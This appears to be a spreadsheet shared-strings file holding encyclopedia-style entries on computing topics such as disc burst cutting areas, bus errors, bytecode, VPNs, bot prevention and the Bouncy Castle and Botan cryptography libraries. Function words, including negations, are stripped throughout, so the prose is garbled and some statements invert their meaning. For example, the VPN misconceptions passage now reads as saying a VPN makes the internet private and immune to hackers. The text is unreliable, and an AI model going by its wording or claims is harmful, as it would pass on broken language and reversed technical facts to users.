    <t>computing, burst cutting area (bca) narrow burst cutting area (nbca) refers circular area near center dvd, blu-ray disc, barcode written additional information codes, manufacturing information, serial numbers. written mastering common discs master usually, written using laser "cut" barcode aluminum reflective layer finished disc, potentially adding unique barcode manufactured disc. mark present, visible naked radius 22.3±0.4 23.5±0.5 confused ifpi barcode present pre-recorded discs. data stored bytes bytes steps bytes. read using laser reading regular data, requires special circuitry decoded. mandatory players support reading bca, dvd-rom drives should, according fuji specification industry-standard optical drive command set). burst cutting area cannot written without using special equipment, therefore used tamper-proof means identifying individual discs. divx format used uniquely identify every disc. information cprm stored dvd-ram dvd-r/rw disc. nintendo optical discs mark prevent copied discs homebrew games. blu-ray discs pre-recorded media serial number (pmsn) stored bca. also mark notes references ecma international. standard ecma-267: read-only disk. forum. specification: part annex blu-ray disc association. physical format specifications (march 2007). osta. "understanding dvd: disc construction manufacturing". osta. "understanding dvd: copying deterrents content protection". faq. "what nbca?". demystified glossary. "bca". burning glossary. "bca burst cutting area".</t>
  </si>
  <si>
    <t>Bus encryption</t>
  </si>
  <si>
    <t>encryption encrypted program instructions data computer includes secure cryptoprocessor executing encrypted instructions. encryption used primarily electronic systems require high security, automated teller machines, set-top boxes, secure data communication devices two-way digital radios. encryption also mean encrypted data transmission data processor another processor. example, require input encrypted instructions. such encryption used windows vista newer microsoft operating systems protect certificates, bios, passwords, program authenticity. pvp-uab (protected video path) provides encryption premium video content passes pcie graphics cards enforce digital rights management. need encryption arises multiple people access internal circuitry electronic system, either service repair systems, stock spare components systems, system, steal system, find lost abandoned system. encryption necessary prevent tampering encrypted instructions easily discovered data data transmission, also prevent discovery decrypted instructions reveal security weaknesses intruder exploit. set-top boxes, necessary download program instructions periodically customer's units provide features bugs. these instructions encrypted transmission, must also remain secure data buses execution prevent manufacture unauthorized cable boxes. this accomplished secure crypto-processors read encrypted instructions data external data memory, decrypt instructions cryptoprocessor, execute instructions cryptoprocessor. also copy protection notes references elbaz, al., hardware engines encryption survey, 2005.pdf robert best, patent 4,278,837, july 1981</t>
  </si>
  <si>
    <t>Bus error</t>
  </si>
  <si>
    <t>computing, error fault raised hardware, notifying operating system (os) process trying access memory cannot physically address: invalid address address bus, hence name. modern architectures much rarer segmentation faults, occur primarily memory access violations: problems logical address permissions. posix-compliant platforms, errors usually result sigbus signal sent process caused error. sigbus also caused general device fault computer detects, though error rarely means computer hardware physically broken—it normally caused software. errors also raised certain paging errors; below. causes there least three main causes errors: non-existent address software instructs read write specific physical memory address. accordingly, sets physical address address requests hardware connected respond results, answer specific address. hardware responds, raises exception, stating requested physical address unrecognized whole computer system. note covers physical memory addresses. trying access undefined virtual memory address generally considered segmentation fault rather error, though separate, processor cannot tell difference. unaligned access most cpus byte-addressable, unique memory address refers 8-bit byte. most cpus access individual bytes memory address, generally cannot access larger units bits, bits, bits without units "aligned" specific boundary (the platform notable exception). example, multi-byte accesses must bit-aligned, addresses (given bytes) would considered aligned therefore accessible, addresses would considered unaligned. similarly, multi-byte accesses must 32-bit aligned, addresses would considered aligned therefore accessible, addresses would considered unaligned. attempting access unit larger byte unaligned address cause error. some systems hybrid depending architecture used. example, hardware based system/360 mainframe, including system fujitsu b8000, spectra, univac series instructions must 16-bit boundary, execution addresses must start even byte. attempts branch address results specification exception. data, however, retrieved address memory, byte longer depending instruction. cpus generally access data full width data times. address bytes, access memory full width data bus, mask shift address individual byte. systems tolerate inefficient algorithm, essential feature software, especially string processing. unlike bytes, larger units span aligned addresses would thus require fetch data bus. possible cpus support this, functionality rarely required directly machine code level, thus designers normally avoid implementing instead issue errors unaligned memory access. paging errors freebsd, linux solaris signal error virtual memory pages cannot paged e.g. disappeared (e.g. accessing memory-mapped file executing binary image truncated program running), just-created memory-mapped file cannot physically allocated, disk full. non-present segment (x86) exists older memory management mechanism known segmentation. application loads segment register selector non-present segment (which posix-compliant oses done assembly language), exception generated. some oses used swapping, linux generates sigbus. example this example unaligned memory access, written programming language at&amp;t assembly syntax. compiling running example posix compliant demonstrates error: debugger shows immediate value 0x2a stored location stored register, using assembly language. this example register indirect addressing. printing order bits address shows aligned word boundary ("dword" using terminology). references</t>
  </si>
  <si>
    <t>Business continuance volume</t>
  </si>
  <si>
    <t>disk arrays, business continuance volume, bcv, corporation's term independently addressable copy data volume, uses advanced mirroring technique business continuity purposes. bcvs detached active data storage point time mounted non-critical servers facilitate offline backup parallel processing. once offline processes completed, bcvs either: discarded re-attached (re-synchronized) production data used source recover production data types there types bcvs: clone traditional method, uses one-to-one separate physical storage (splitable disk mirror) least impact production performance high cost additional storage persistent usage snapshot bcv, uses copy write algorithm production volume uses small additional storage, holds changes made production volume lower cost additional storage reads writes impact performance production storage snapshot storage fills snapshot becomes invalid unusable short-term usage references external links analytical intelligence background industry with interviews data</t>
  </si>
  <si>
    <t>Virtual file server</t>
  </si>
  <si>
    <t>computing, virtual file server system consisting virtualized devices store computer files documents, sound files, photographs, movies, images databases. server accessed workstations application servers virtual fileserver network (vfn).the term "server" highlights role virtual machine client-server scheme, clients applications accessing storage. file server usually application programs behalf clients. enables storage retrieval data, computation provided client. with storage area network (san), server(s) purely virtual storage devices, client maintaining file system. with network-attached storage (nas), server(s) manage file system. both servers virtualized users know physical devices hosting files. virtual file server typically combines security virtual private networks (vpn) file synchronization, distribution sharing services network file servers.various companies offer software organization managing virtual file servers. operating system stripped-down, concerned file management functions synchronizing redundant copies file, failure recovery, handling concurrent updates different clients enforcing client access rights. some companies offer virtual file servers service organizations prefer outsource server operations, servers residing "cloud". also storage virtualization storage area network network-attached storage virtual private network platform service references</t>
  </si>
  <si>
    <t>Virtual disk and virtual drive</t>
  </si>
  <si>
    <t>virtual disk virtual drive software components emulate actual disk storage device. virtual disks virtual drives common components virtual machines hardware virtualization, also widely used various purposes unrelated virtualization, creation logical disks. operation virtual drive software component emulates actual disk drive, optical disc drive, floppy disk drive, hard disk drive. programs, virtual drive looks behaves like actual physical device. virtual disk following forms: disk image, computer file contains exact data structure actual storage device logical disk (also known vdisk), array actual drives cooperatively like single device disk, stores data random-access memory (ram) instead storage device mapped network drive connects file server uses hardware virtualization, virtual machines implement virtual drives part efforts emulate behavior actual machine. ordinary computer, virtual machine needs virtual drive disk image start except performing network boot. more virtual drives added needed. virtual optical drives used physical computers transfer contents optical disks onto hard disk drives. doing helps resolving problem short life span dvds takes advantage faster data transfer rate hard disk drives. however, virtual optical drives also used software piracy: early computer games used disc existence verification ensure licensed use, circumvented using virtual optical drives. countermeasure, starforce copy protection scheme attempts thwart disc virtualization. modern video games migrated online product activation part distribution process. also comparison disc image software floating drive removable media storage virtualization</t>
  </si>
  <si>
    <t>Byte Code Engineering Library</t>
  </si>
  <si>
    <t>byte code engineering library (bcel) project sponsored apache foundation previously jakarta charter provide simple decomposing, modifying, recomposing binary java classes (i.e. bytecode). project conceived developed markus dahm prior officially donated apache jakarta foundation october 2001. uses bcel provides simple library exposes internal aggregate components given java class object constructs opposed disassembly lower-level opcodes). these objects also expose operations modifying binary bytecode, well generating bytecode (via injection code existing code, generation classes altogether.) bcel library used several diverse applications, java bytecode decompiling, obfuscation, refactoring performance profilinginstrumentation calls capture performance metrics injected java class binaries examine memory/coverage data. (for example, injecting instrumentation entry/exit points.)implementation language semanticsfor example, aspect-oriented additions java language implemented using bcel decompose class structures point-cut identification, reconstituting class injecting aspect-related code back binary. (see: aspectj)static code analysisfindbugs uses bcel analyze java bytecode code idioms indicate bugs. also objectweb javassist external links apache commons bcel bcel project home page. bcel-based project listing listing projects make bcel library. apache jakarta home apache jakarta home page. aspectj aspectj project home page. (one high-visibility projects makes bcel.)</t>
  </si>
  <si>
    <t>Bytecode</t>
  </si>
  <si>
    <t>bytecode (also called portable code p-code) form instruction designed efficient execution software interpreter. unlike human-readable source code, bytecodes compact numeric codes, constants, references (normally numeric addresses) encode result compiler parsing performing semantic analysis things like type, scope, nesting depths program objects. name bytecode stems instruction sets one-byte opcodes followed optional parameters. intermediate representations bytecode output programming language implementations ease interpretation, used reduce hardware operating system dependence allowing code cross-platform, different devices. bytecode often either directly executed virtual machine p-code machine, i.e., interpreter), compiled machine code better performance. since bytecode instructions processed software, arbitrarily complex, nonetheless often akin traditional hardware instructions: virtual stack machines common, virtual register machines built also. different parts often stored separate files, similar object modules, dynamically loaded execution. execution bytecode program executed parsing directly executing instructions, time. this kind bytecode interpreter portable. some systems, called dynamic translators, just-in-time (jit) compilers, translate bytecode machine code necessary runtime. this makes virtual machine hardware-specific lose portability bytecode. example, java smalltalk code typically stored bytecode format, typically compiled translate bytecode machine code execution. this introduces delay program run, bytecode compiled native machine code, improves execution speed considerably compared interpreting source code directly, normally around order magnitude (10x).because performance advantage, today many language implementations execute program phases, first compiling source code bytecode, passing bytecode virtual machine. there bytecode based virtual machines sort java, raku, python, php, tcl, mawk forth (however, forth seldom compiled bytecodes way, virtual machine generic instead). implementation perl ruby instead work walking abstract syntax tree representation derived source code. more recently, authors dart challenged notion intermediate bytecode needed fast efficient implementation. both language implementations currently direct compiling source code machine code bytecode intermediary. examples actionscript executes actionscript virtual machine (avm), part flash player air. actionscript code typically transformed bytecode format compiler. examples compilers include built adobe flash professional built adobe flash builder available adobe flex sdk. adobe flash objects bancstar, originally bytecode interface-building tool used also language berkeley packet filter berkeley pascal byte code engineering library java virtual machine compilers clisp implementation common lisp used compile bytecode many years; however, also supports compiling native code help lightning cmucl scieneer common lisp implementations common lisp compile either native code bytecode, compact common intermediate language executed common language runtime, used .net languages dalvik bytecode, designed android platform, executed dalvik virtual machine bytecode, designed inferno (operating system), executed virtual machine eiffelstudio eiffel programming language amsterdam compiler virtual machine used intermediate compiling language modern bytecode language emacs text editor functions implemented emacs lisp, built-in dialect lisp. these features compiled bytecode. this architecture allows users customize editor high level language, compiling bytecode yields reasonable performance. embeddable common lisp implementation common lisp compile bytecode code common lisp provides disassemble function prints standard output underlying code specified function. result implementation-dependent resolve bytecode. inspection utilized debugging optimization purposes. steel bank common lisp, instance, produces: ericsson implementation erlang uses beam bytecodes ethereum's virtual machine (evm) runtime environment, using bytecode, transaction execution ethereum (smart contracts). icon unicon programming languages infocom used z-machine make software applications portable java bytecode, executed java virtual machine bcel javassist keiko bytecode used oberon-2 programming language make oberon operating system portable. keyb, ms-dos/pc keyboard driver resource file keyboard.sys containing layout information short p-code sequences executed interpreter inside resident driver. llvm lsl, scripting language used virtual worlds compiles bytecode running virtual machine. second life original mono version, inworldz developed phlox version. language uses register-based bytecode virtual machine m-code matlab language malbolge esoteric machine language ternary virtual machine. microsoft p-code used visual visual basic multiplan o-code bcpl programming language ocaml language optionally compiles compact bytecode form p-code ucsd pascal implementation pascal language parrot virtual machine pick basic also referred data basic multivalue basic environment statistical computing offers bytecode compiler compiler package, standard version 2.13.0. possible compile version base recommended packages exploit this. pyramid 2000 adventure game python scripts compiled execution python's bytecode language, compiled files (.pyc) cached inside script's foldercompiled code analysed investigated using built-in tool debugging low-level bytecode. tool initialized shell, example: scheme implementation scheme using bytecode interpreter bytecodes many implementations smalltalk language spin interpreter built parallax propeller microcontroller sqlite database engine translates statements bespoke byte-code format. apple sweet16 timi used compilers platform. tiny basic visual foxpro compiles bytecode webassembly yarv rubinius ruby zcode also intermediate representation platform (computing) runtime system notes references</t>
  </si>
  <si>
    <t>Virtual private database</t>
  </si>
  <si>
    <t>virtual private database masks data larger database subset data appears exist, without actually segregating data different tables, schemas databases. typical application constraining sites, departments, individuals, etc. operate records time allowing privileged users operations (e.g. reports, data warehousing, etc.) access whole table. term typical oracle dbms, implementation general: tables associated functions, return predicate expression. whenever query executed, relevant predicates involved tables transparently collected used filter rows. select, insert, update delete different rules. external links using virtual private database implement application security policies http://www.oracle-base.com/articles/8i/virtualprivatedatabases.php</t>
  </si>
  <si>
    <t>Virtual private network</t>
  </si>
  <si>
    <t>virtual private network (vpn) extends private network across public network enables users send receive data across shared public networks computing devices directly connected private network. benefits include increases functionality, security, management private network. provides access resources inaccessible public network typically used remote workers. encryption common, although inherent part connection.a created establishing virtual point-to-point connection dedicated circuits tunneling protocols existing networks. available public internet provide benefits wide area network (wan). from user perspective, resources available within private network accessed remotely. types virtual private networks classified several categories: remote access host-to-network configuration analogous connecting computer local area network. this type provides access enterprise network, intranet. this employed remote workers need access private resources, enable mobile worker access important tools without exposing public internet.site-to-site site-to-site configuration connects networks. this configuration expands network across geographically disparate offices, group offices data center installation. interconnecting link dissimilar intermediate network, ipv6 networks connected ipv4 network.extranet-based site-to-site context site-to-site configurations, terms intranet extranet used describe different cases. intranet site-to-site describes configuration sites connected belong organization, whereas extranet site-to-site joins sites belonging multiple organizations.typically, individuals interact remote access vpns, whereas businesses tend make site-to-site connections business-to-business, cloud computing, branch office scenarios. despite this, technologies mutually exclusive and, significantly complex business network, combined enable remote access resources located given site, ordering system resides data center. systems also classified tunneling protocol used tunnel traffic tunnel's termination point location, e.g., customer edge network-provider edge type topology connections, site-to-site network-to-network levels security provided layer present connecting network, layer circuits layer network connectivity number simultaneous connections security mechanisms vpns cannot make online connections completely anonymous, increase privacy security. prevent disclosure private information data sniffing, vpns typically allow authenticated remote access using tunneling protocols secure encryption techniques. security model provides: confidentiality even network traffic sniffed packet level (see network sniffer deep packet inspection), attacker would encrypted data, data. sender authentication prevent unauthorized users accessing vpn. message integrity detect reject instances tampering transmitted messages. secure protocols include following: internet protocol security (ipsec) initially developed internet engineering task force (ietf) ipv6, required standards-compliant implementations ipv6 6434 made recommendation. this standards-based security protocol also widely used ipv4 layer tunneling protocol. design meets security goals: availability, integrity, confidentiality. ipsec uses encryption, encapsulating packet inside ipsec packet. de-encapsulation happens tunnel, original packet decrypted forwarded intended destination. transport layer security (ssl/tls) tunnel entire network's traffic openvpn project softether project) secure individual connection. number vendors provide remote-access capabilities ssl. connect locations ipsec runs trouble network address translation firewall rules. datagram transport layer security (dtls) used cisco anyconnect openconnect solve issues tunneling (ssl/tls tcp-based, tunneling lead delays connection aborts). microsoft point-to-point encryption (mppe) works point-to-point tunneling protocol several compatible implementations platforms. microsoft secure socket tunneling protocol (sstp) tunnels point-to-point protocol (ppp) layer tunneling protocol traffic ssl/tls channel (sstp introduced windows server 2008 windows vista service pack multi path virtual private network (mpvpn). ragula systems development company owns registered trademark "mpvpn". secure shell (ssh) openssh offers tunneling (distinct port forwarding) secure remote connections network, inter-network links, remote systems. openssh server provides limited number concurrent tunnels. feature support personal authentication. often used remotely connect machines networks instead site site connection. wireguard protocol. 2020, wireguard support added linux android kernels, opening adoption providers. default, wireguard utilizes curve25519 protocol exchange chacha20-poly1305 encryption message authentication, also includes ability pre-share symmetric client server. ikev2 acronym stands internet exchange version created microsoft cisco used conjunction ipsec encryption authentication. primary mobile devices, whether networks, since automatically reconnecting connection lost. openvpn free open-source protocol based upon protocol. supports perfect forward-secrecy, modern secure cipher suits, like aes, serpent, twofish, etc. currently developed updated openvpn inc., non-profit providing secure technologies. authentication tunnel endpoints must authenticated secure tunnels established. user-created remote-access vpns passwords, biometrics, two-factor authentication cryptographic methods. network-to-network tunnels often passwords digital certificates. depending protocol, store allow tunnel establish automatically, without intervention administrator. data packets secured tamper proofing message authentication code (mac), prevents message altered tampered without rejected matching altered data packet. routing tunneling protocols operate point-to-point network topology would theoretically considered definition expected support arbitrary changing sets network nodes. since router implementations support software-defined tunnel interface, customer-provisioned vpns often simply defined tunnels running conventional routing protocols. provider-provisioned building-blocks depending whether provider-provisioned (ppvpn) operates layer (l2) layer (l3), building blocks described only, only, combination both. multi-protocol label switching (mpls) functionality blurs l2-l3 identity.rfc 4026 generalized following terms cover mpls vpns (bgp) vpns, introduced 2547. customer devicesa device within customer's network directly connected service provider's network. devices aware vpn. customer edge device (ce)a device edge customer's network provides access ppvpn. sometimes demarcation point provider customer responsibility. other providers allow customers configure provider edge device (pe)a device, devices, edge provider network connects customer networks devices presents provider's view customer site. aware vpns connect them, maintain state. provider device (p)a device operates inside provider's core network directly interface customer endpoint. might, example, provide routing many provider-operated tunnels belong different customers' ppvpns. while device part implementing ppvpns, vpn-aware maintain state. principal role allowing service provider scale ppvpn offerings, example, acting aggregation point multiple pes. p-to-p connections, role, often high-capacity optical links major locations providers. user-visible ppvpn services layer services vlan vlan layer technique allows coexistence multiple local area network (lan) broadcast domains interconnected trunks using ieee 802.1q trunking protocol. other trunking protocols used become obsolete, including inter-switch link (isl), ieee 802.10 (originally security protocol subset introduced trunking), emulation (lane). virtual private service (vpls) developed institute electrical electronics engineers, vlans allow multiple tagged lans share common trunking. vlans frequently comprise customer-owned facilities. whereas vpls described section (osi layer services) supports emulation point-to-point point-to-multipoint topologies, method discussed extends layer technologies 802.1d 802.1q trunking transports metro ethernet. used context, vpls layer ppvpn, emulating full functionality traditional lan. from user standpoint, vpls makes possible interconnect several segments packet-switched, optical, provider core, core transparent user, making remote segments behave single lan.in vpls, provider network emulates learning bridge, optionally include vlan service. pseudo wire (pw) similar vpls, provide different protocols ends. typically, interface protocol asynchronous transfer mode frame relay. contrast, aiming provide appearance contiguous locations, virtual private service ipls would appropriate. ethernet tunneling etherip (rfc 3378) ethernet tunneling protocol specification. etherip packet encapsulation mechanism. confidentiality message integrity protection. etherip introduced freebsd network stack softether server program. ip-only lan-like service (ipls) subset vpls, devices must layer capabilities; ipls presents packets rather frames. support ipv4 ipv6. layer ppvpn architectures this section discusses main architectures ppvpns, disambiguates duplicate addresses single routing instance, other, virtual router, contains virtual router instance vpn. former approach, variants, gained attention. challenges ppvpns involves different customers using address space, especially ipv4 private address space. provider must able disambiguate overlapping addresses multiple customers' ppvpns. bgp/mpls ppvpnin method defined 2547, extensions advertise routes ipv4 address family, form 12-byte strings, beginning 8-byte route distinguisher (rd) ending 4-byte ipv4 address. disambiguate otherwise duplicate addresses understand topology vpn, interconnected mpls tunnels either directly routers. mpls terminology, routers label switch routers without awareness vpns. virtual router ppvpnthe virtual router architecture, opposed bgp/mpls techniques, requires modification existing routing protocols bgp. provisioning logically independent routing domains, customer operating completely responsible address space. various mpls tunnels, different ppvpns disambiguated label need routing distinguishers. unencrypted tunnels some virtual networks tunneling protocols without encryption protecting privacy data. while vpns often provide security, unencrypted overlay network within secure trusted categorization. example, tunnel hosts generic routing encapsulation (gre) virtual private network neither secure trusted.native plaintext tunneling protocols include layer tunneling protocol (l2tp) without ipsec point-to-point tunneling protocol (pptp) microsoft point-to-point encryption (mppe). trusted delivery networks trusted vpns cryptographic tunneling; instead rely security single provider's network protect traffic. multiprotocol label switching (mpls) often overlays vpns, often quality-of-service control trusted delivery network. l2tp standards-based replacement, compromise taking good features each, proprietary protocols: cisco's layer forwarding (l2f) (obsolete 2009) microsoft's point-to-point tunneling protocol (pptp).from security standpoint, vpns either trust underlying delivery network must enforce security mechanisms itself. unless trusted delivery network runs among physically secure sites only, trusted secure models need authentication mechanism users gain access vpn. vpns mobile environments mobile virtual private networks used settings endpoint fixed single address, instead roams across various networks data networks cellular carriers multiple wi-fi access points without dropping secure session losing application sessions. mobile vpns widely used public safety give law-enforcement officers access applications computer-assisted dispatch criminal databases, organizations similar requirements field service management healthcare.. networking limitations limitation traditional vpns point-to-point connections tend support broadcast domains; therefore, communication, software, networking, based layer broadcast packets, netbios used windows networking, fully supported local area network. variants virtual private service (vpls) layer tunneling protocols designed overcome limitation. common misconceptions make internet "private". still tracked tracking cookies device fingerprinting, even address hidden. make immune hackers. means good internet privacy. burden trust simply transferred service provider. also references further reading kelly, sean (august 2001). "necessity mother invention". communication news: 26–28. issn 0010-3632. archived original december 2001.</t>
  </si>
  <si>
    <t>Virtual resource partitioning</t>
  </si>
  <si>
    <t>virtual resource partitioning (vrp) operating system-level virtualization technology allocates computing resources (such i/o) transactions. conventional virtualization technologies allocate resources operating system (windows, linux...) wide basis. works levels deeper allowing regulation control resources used specific transactions within application.in many computerized environments, single user, application, transaction appropriate server resources that, affect quality service user experience active users, applications transactions. example, single report data warehouse environment monopolize data access demanding large amounts data. similarly, cpu-bound application consume server processing power starve activities. allows balancing, regulating manipulating resource consumption individual transactions, that, improving overall quality service, compliance service level agreements, ultimate user experience. technology overview usually implemented completely transparent application transaction. technology creates virtual resource "lanes", access controllable amount resources, redirects specific transactions lanes allowing take less resources. implemented available windows, hat, suse, hp-ux, solaris, tru64, others. application communicates kernel specific requires different implementation. safe implementation usually combines several resource allocation techniques. implementations depend rapidly varying transaction type, consumed resource kernel state. implementation must adapt changes real-time. references trend industry technical overview implemented vendors</t>
  </si>
  <si>
    <t>Virtual security appliance</t>
  </si>
  <si>
    <t>virtual security appliance computer appliance runs inside virtual environments. called appliance pre-packaged hardened operating system security application runs virtualized hardware. hardware virtualized using hypervisor technology delivered companies vmware, citrix microsoft. security application vary depending particular network security vendor. some vendors reflex systems chosen deliver intrusion prevention technology virtualized appliance, multifunctional server vulnerability shield delivered blue lane. type security technology irrelevant comes definition virtual security appliance relevant comes performance levels achieved deploying various types security virtual security appliance. other issues include visibility hypervisor virtual network runs inside. security appliance history traditionally, security appliances viewed high performance products custom asic chips allow higher performance levels dedicated hardware approach. many vendors started call pre-built operating systems dedicated applications dedicated server hardware likes ibm, dell offshore brands “appliances”. appliance terminology although heavily used strayed original roots. administrator would expect underpinning linux employ monolithic kernel since hardware platform presumably static vendor-controlled. however, following examples configured loadable kernel modules, reflecting dynamic nature underlying hardware platforms used product managers. "appliances" varying degrees administrative openness. enterasys dragon version sensors (ge250 ge500) lightly hardened version slackware linux distribution, complete administrative vulnerabilities, shipping anonymous root access preferred method administration underlying motorola airdefense management consoles shipped "appliance" without supported root access. administrative setup tasks performed textual menus running unprivileged user. websense sensor devices centos underneath also allow root access setup time. mcafee's older e-policy orchestator distributions redhat -based distribution, modifications typical configuration files reset reboot. most devices primary configuration interfaces. implication patches required appliances less accurate implication vendors less provide swift modular patches without complete reimaging devices. companies netscreen technologies tippingpoint defined security appliances dedicated hardware custom asic chips deliver high performing firewall intrusion prevention technology respectively. these companies defined specific markets early 2000–2004 time frame. modern term security appliances time custom asic chips dedicated hardware also delivered hardened operating systems pre-install security applications. this capability delivered performance well ease installation result, software vendors began calling pre-installed security applications general purpose hardware, “security appliances”. this model became appealing pure software vendors stonesoft checkpoint software began shipping pre-built operating systems security applications long history selling software installed existing customer hardware customer operating systems. with explosion virtualization technology brought ability virtualize hardware create multiple software computer instances, became apparent 2005 security vendors method deploying security appliances horizon. first time history vendor could deliver hardened operating system pre-installed security application promised ease deployment without couple dedicated hardware device. challenge with technologies comes trade-offs case virtual security appliances trade-off many times performance restrictions. past, companies tipping point delivered intrusion prevention technology appliance form factor provided highest levels performance leveraging application specific integration circuits [asic] field programmable gate arrays [fpga] reside dedicated hardware boards. today, companies reflex security blue lane virtualizing intrusion prevention, firewall application layer technologies. these goals challenged delivering optimal performance levels virtualized world, applications running operating systems compete hardware computing resources. physical appliance world, resources dedicated less likely suffer blocking status waiting resources. some security applications maintain fewer dynamic states. firewall technologies typically inspect smaller amounts data headers usually maintain less state. therefore, simple firewall technologies likely candidates virtualization. many intrusion prevention technologies signatures dynamic configurations enable deep inspection payload sometimes monitoring session streams. intrusion prevention also typically requires heavy state retention maintenance, make heavy dynamic data memory. often highly dynamic data memory segments less able deduplicated dynamic code segments. shared resources required often leads resource contention latency particularly systems forward datagrams. technology blue lane's application layer enforcement less affected inspects less traffic: heading known vulnerabilities letting innocent traffic pass. another reason performance challenges technologies dynamic signatures make inspection applications need user processes outside operating system kernel avoid outages incurred kernel reloads system reboots. user processes typically suffer higher overhead separation governing operating systems' memory process management policies. firewall technologies traditionally part operating system kernel. performance concerns reduced tight coupling operating system internals. overcome limitations, asics multi-core processors traditionally used applications. this luxury available virtualized environments virtualization technologies typically allow direct hardware access underlying application-specific hardware. virtualization well suited general purpose applications would otherwise underutilized dedicated hosting hardware. overcompensating loss specific hardware using larger normal amounts compute cycles encryption, memory state maintenance, defeats purpose server virtualization. examples virtual security appliances citrix access gateway layer securespan virtual appliance vmware microsoft internet security acceleration (isa) server virtual appliance vmware vshield further reading http://www.networkworld.com/news/2007/041807-virtual-security.html also virtual machine virtual appliance virtual firewall network function virtualization</t>
  </si>
  <si>
    <t>BoringSSL</t>
  </si>
  <si>
    <t>Bot prevention</t>
  </si>
  <si>
    <t>prevention refers methods used services prevent access automated processes. types bots studies suggest half traffic internet activity, half classified 'bad bots'.bots used various purposes online. some bots used passively scraping purposes, example gather information airlines flight prices destinations. other bots, sneaker bots, help operator acquire high-demand luxury goods; sometimes resold secondary market higher prices, commonly known 'scalping'. detection techniques avoidance various fingerprinting behavioural techniques used identify whether client human user bot. turn, bots range techniques avoid detection appear like human server.browser fingerprinting techniques common component anti-bot protection systems. data usually collected client-side javascript transmitted anti-bot service analysis. data collected includes results javascript apis (checking given implemented returns results expected normal browser), rendering complex webgl scenes, using canvas api.tls fingerprinting techniques categorise client analysing supported cipher suites handshake. these fingerprints used create whitelists/blacklists containing fingerprints known browser stacks. 2017, salesforce open sourced fingerprinting library (ja3). between august september 2018, akamai noticed large increase tampering across network evade detection.behaviour-based techniques also utilised, although less commonly fingerprinting techniques, rely idea bots behave differently human visitors. common behavioural approach analyse client's mouse movements determine typical human.more traditional techniques captchas also often employed, however generally considered ineffective simultaneously obtrusive human visitors.the javascript prevent bots rely basic requests (such curl), load detection script hence fail progress. common method bypass many techniques headless browser simulate real browser execute client-side javascript detection scripts. there variety headless browsers used; custom (such phantomjs) also possible operate typical browsers google chrome headless mode using driver. selenium common automation framework makes easier control headless browser. anti-bot detection systems attempt identify implementation methods specific headless browsers, lack proper implementation apis would implemented regular browsers.the source code javascript files typically obfuscated make harder reverse engineer detection works. common techniques include: minification string arrays control flow flattening dead code injection debugger statements, prevent debuggers like devtoolsanti-bot protection services offered various internet companies, cloudflare akamai. united states, better online tickets sales (commonly known bots act) passed 2016 prevent uses bots commerce. year later, united kingdom passed similar regulations digital economy 2017. effectiveness measures disputed. references</t>
  </si>
  <si>
    <t>Botan (programming library)</t>
  </si>
  <si>
    <t>botan bsd-licensed cryptographic library written c++11. provides wide variety cryptographic algorithms, formats, protocols, e.g. tls. used monotone distributed revision control program, opendnssec system, isc's dhcp server among projects. project originally called opencl, name used apple inc. khronos group heterogeneous system programming framework. renamed botan 2002.in 2007, german federal office information security contracted flexsecure gmbh implementation card verifiable certificates epassports botan; modified version botan released name insito.starting 2015, german federal office information security funded project, included improving documentation, test suite feature botan, culminating 2017, evaluated recommended library suitable "applications increased security requirements". also comparison cryptography libraries references external links official website</t>
  </si>
  <si>
    <t>Visible Light Photon Counter</t>
  </si>
  <si>
    <t>visible light photon counter (vlpc) photon counting photodetector based impurity-band conduction arsenic-doped silicon. they high quantum efficiency able detect single photons visible range electromagnetic spectrum. ability count exact number photons detected extremely important quantum distribution. rockwell international's science center previously announced "solid-state photomultiplier" (sspm), wide-band (0.4–28 detector. late 1980s collaboration initially consisting rockwell ucla began developing scintillating-fiber particle trackers superconducting super collider, based dedicated variant sspm came known visible light photon counter.the operating principles similar apds based impurity-band conduction. devices made arsenic-doped silicon impurity band conduction band, resulting gain 40000 80000 reverse bias volts (e.g. narrow bandgap reduces gain dispersion, resulting uniform response photon, hence output pulse height proportional number incident photons. vlpcs must operate cryogenic temperatures (6–10 they quantum efficiency temporal resolution several nanoseconds.vlpcs used extensively central tracking detector experiment, muon beam-cooling studies muon collider (mice). they also evaluated quantum information science. notes references</t>
  </si>
  <si>
    <t>Bouncy Castle (cryptography)</t>
  </si>
  <si>
    <t>bouncy castle collection apis used cryptography. includes apis java programming languages. apis supported registered australian charitable organization: legion bouncy castle inc. bouncy castle australian origin therefore american restrictions export cryptography united states apply history bouncy castle started colleagues tired re-invent cryptography libraries time changed jobs working server-side java developers active java (j2me time) development hobby design consideration include greatest range java library, including j2me. this design consideration architecture exists bouncy castle.the project, founded 2000, originally written java only, later added 2004. original java consisted approximately 27,000 lines code, including test code provided support j2me, jce/jca provider, basic x.509 certificate generation. comparison, 1.53 release consists 390,640 lines code, including test code. supports functionality original release larger number algorithms, plus pkcs#10, pkcs#12, cms, s/mime, openpgp, dtls, tls, ocsp, tsp, cmp, crmf, dvcs, dane, attribute certificates. around 145,000 lines code supports java does. some properties project are: strong emphasis standards compliance adaptability. public support facilities include issue tracker, mailing list wiki available website. commercial support provided resources relevant listed bouncy castle websiteon october 2013, not-for-profit association, legion bouncy castle inc. established state victoria, australia, core developers others take ownership project support ongoing development apis. association recognised australian charity purpose advancement education purpose beneficial community australian charities not-for-profits commission november 2013. association authorised fundraise support purposes november 2013 consumer affairs victoria. architecture bouncy castle architecture consists main components support base cryptographic capabilities. these known 'light-weight' api, java cryptography extension (jce) provider. further components built upon provider support additional functionality, support, s/mime, etc. low-level, 'light-weight', apis implement underlying cryptographic algorithms. apis designed simple enough needed, provided basic building blocks provider. intent low-level memory constrained devices (javame) easy access libraries possible (such distribution applet). light-weight java code, java virtual machine (jvm) impose restrictions operation code, early times bouncy castle history develop strong cryptography crippled jurisdiction policy files prevented providers performing "strong" encryption. jce-compatible provider built upon low-level apis. such, source code provider example implement many "common" crypto problems using low-level api. many projects built using provider, including open source certificate authority ejbca. certified releases java releases fips 140-2 level certified streams well. these differ regular releases that, modules designed similar fashion regular releases, low-level apis quite different largely support enforcement controls fips requires algorithm used. case level java api, provider still largely drop-in replacement regular release. first fips-certified releases made available november 2016, java version assigned certification number 2768 version assigned certification number 2792. spongy castle android operating system, early 2014, includes customized version bouncy castle. class name conflicts, prevents android applications including using official release bouncy castle as-is. third-party project called spongy castle distributes renamed version library work around issue. stripy castle originally, assumed fips 140-2 version spongy castle could also done. turned android's file processing fips purposes provider needs installed device separate application. fips 140-2 release android called stripy castle packaged org.stripycastle. this needed order avoid clashes android's version bouncy castle well clashes applications might using spongy castle requiring fips 140-2 certified services. also comparison cryptography libraries references external links official website</t>
  </si>
